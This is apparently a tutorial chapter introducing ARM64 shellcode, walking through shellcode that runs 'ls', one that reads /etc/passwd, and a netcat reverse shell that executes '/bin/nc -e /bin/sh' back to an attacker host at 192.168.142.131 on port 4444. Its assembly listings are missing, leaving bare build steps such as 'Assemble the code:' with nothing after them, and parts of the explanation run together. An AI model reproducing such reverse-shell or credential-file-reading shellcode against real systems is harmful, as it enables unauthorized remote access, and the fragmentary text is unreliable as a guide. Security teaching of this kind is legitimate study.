Chapter 5:Introduction to Shellcode
What is Shellcode?
Shellcode is a small piece of machine code used as the payload in the exploitation of software vulnerabilities. The name "shellcode" comes from its common purpose, which is to spawn a shell (a command-line interface).
Common Uses of Shellcode
Exploiting vulnerabilities in software to gain unauthorized access.
Demonstrating security flaws in software for educational purposes.
Basic ARM64 Shellcode: Executing a Command
Let's start with a simple shellcode that executes the "ls" command:
Compiling and Running the Basic Shellcode
Save the shellcode in a file named
ls_shellcode.s
Assemble:
as ls_shellcode.s -o ls_shellcode.o
Link:
ld ls_shellcode.o -o ls_shellcode
Make executable:
chmod +x ls_shellcode
Run:
./ls_shellcode
Understanding the Basic Shellcode
The shellcode uses the execve system call to execute "/bin/ls".
It sets up the arguments on the stack.
System call number (221 for execve) is placed in x8.
The
svc #0
instruction triggers the system call.
Simple shellcode that executes "cat /etc/passwd":
Let's compile and run this:
Save this code in a file named
cat_passwd.s
Assemble the code:
Link the object file:
Make it executable:
Run the shellcode:
This shellcode should execute successfully and display the contents of /etc/passwd.
nc reverse shell shellcode:
Detailed Explanation:
.global _start
and.section .text
: These directives tell the assembler where our code begins and that it should be placed in the text section of the executable.adr x0, nc_path
: Loads the address of the "/bin/nc" string into x0. This will be the program we execute.mov x1, sp
: We'll use the stack to store our array of arguments. This moves the current stack pointer into x1.str x0, [x1]
: Stores the address of "/bin/nc" as the first argument in our array.The next few
adr
andstr
instructions load the addresses of our other arguments ("-e", "/bin/sh", IP, port) and store them in the array.mov x2, #0
andstr x2, [x1, #40]
: This NULL-terminates our argument array.mov x8, #221
: Loads the syscall number for execve into x8.svc #0
: Triggers the syscall, executing netcat with our arguments.The last part is an exit syscall in case execve fails.
The
.asciz
directives at the end define our string constants.
Step-by-step Instructions:
Save the code in a file named
nc_reverse_shell.s
Assemble the code:
This creates an object file from our assembly code.
Link the object file:
This creates an executable from our object file.
Make the file executable:
On your attacking machine (192.168.142.131), start a listener:
This listens for incoming connections on port 4444.
On the target machine, run the shellcode:
This approach uses netcat directly, which is often available on Unix-like systems. It's simpler than creating a raw socket connection and should be more reliable. However, it does require netcat to be installed on the target system.
Last updated